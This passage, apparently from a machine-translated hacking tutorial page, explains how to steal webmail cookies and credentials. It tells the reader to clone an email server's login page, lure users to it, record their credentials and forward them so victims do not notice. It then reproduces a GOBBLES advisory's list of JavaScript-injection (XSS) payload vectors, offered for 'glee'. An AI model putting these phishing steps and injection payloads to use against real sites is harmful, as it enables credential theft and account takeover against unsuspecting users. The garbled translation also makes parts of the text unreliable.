And preserves cookie the script
</script>
When connection, what matter has? cookie had, you should know how to manage!
If in you are not such situation at present, you may the copy email server's debarkation page, hang to other systems on,
Then the guidance user lands your malicious system page
Such user information you may record, then again record message routing true email server page,
These fools will not realize the matter which will occur actually.
Inserts the WEB page's different method the javascript script:
<snip>
Copy from: GOBBLES SECURITY ADVISORY #33
Here is a cut-n-paste collection of typical JavaScript-injection hacks
you may derive some glee from playing with.
<a href= " javascript#[code] “>
<div onmouseover= " [code] “>
<img src= " javascript:[code] “>
<img dynsrc= " javascript:[code] “> [IE]
<input type= " image " dynsrc= " javascript:[code] “> [IE]
<bgsound src= " javascript:[code] “> [IE]
&<script>[code]</script>
& {[code]}; [N4]
<img src=&{[code]}; > [N4]
<link rel= " stylesheet " href= " javascript:[code] “>
<iframe src= " vbscript:[code] “> [IE]
<img src= " mocha:[code] “> [N4]
<img src= " livescript:[code] “> [N4]
<a href= " about:<script>[code]</script> " >
<meta http-equiv= " refresh " content= " 0; url=javascript:[code] “>
<body onload= " [code] “>
<div style= " background-image: url(javascript:[code]); “>
<div style= " behaviour: url ([link to code]); “> [IE]
<div style= " binding: url ([link to code]); “> [Mozilla]
<div style= " width: expression([code]); “> [IE]
<style type= " text/javascript " > [code]</style> [N4]
<object classid= " clsid: … “codebase= " javascript:[code] “> [IE]
<style><! --</style><script>[code]//--></script>
<! [CDATA [<! --]] ><script>[code]//--></script>
<! -- -- --><script>[code]</script><! -- -- -->
<script>[code]</script>
<img src= " blah " onmouseover= " [code] “>
<img src= " blah> " onmouseover= " [code] “>
<xml src= " javascript:[code] “>
<xml id= " X " ><a><b><script>[code]</script>; </b></a></xml>
<div datafld= " b " dataformatas= " html " datasrc= " #X " ></div>
Other pages: : <<Prev * 1 * 2 * 3 * 4 * 5 * Next>>
|